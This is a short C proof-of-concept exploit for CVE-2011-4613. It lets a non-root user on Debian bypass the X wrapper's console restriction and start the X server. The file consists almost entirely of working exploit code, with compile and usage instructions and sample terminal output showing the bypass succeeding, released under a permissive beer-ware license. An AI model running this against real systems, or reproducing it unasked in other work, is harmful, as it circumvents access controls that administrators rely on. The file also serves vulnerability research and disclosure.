/* bypass-Xwrapper.c -- X wrapper permission bypass PoC (CVE-2011-4613)
   -----------------------------------------------------------------------
   On a Debian's default configuration, this trivial PoC allows a non-root
   user to bypass the X wrapper restrictions and starts the X server.

   Compile:  cc bypass-Xwrapper.c -o bypass-Xwrapper
   Usage:    ./bypass-Xwrapper [:display]

     $ tty
     /dev/pts/4   // not a real TTY, won't have permissions to start X
     $ X :1
     X: user not authorized to run the X server, aborting.
     $ ./bypass-Xwrapper :1
     [X server starts]

   Tested on Debian 6.0.3 up to date withthe xserver-xorg package (version
   1:7.5+8).
   -----------------------------------------------------------------------
   "THE BEER-WARE LICENSE" (Revision 42):
   <vladz@devzero.fr> wrote this file. As long as you retain this notice
   you can do whatever you want with this stuff. If we meet some day, and
   you think this stuff is worth it, you can buy me a beer in return. -V.
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#define X_WRAPPER    "/usr/bin/X"

int main(int argc, char **argv) {
   char *opt[] = { X_WRAPPER, argv[1], NULL };
   int newstdin = open("/dev/tty", O_RDONLY);

   dup2(newstdin, 0); 
   execve(X_WRAPPER, opt, NULL);

   return 0;
}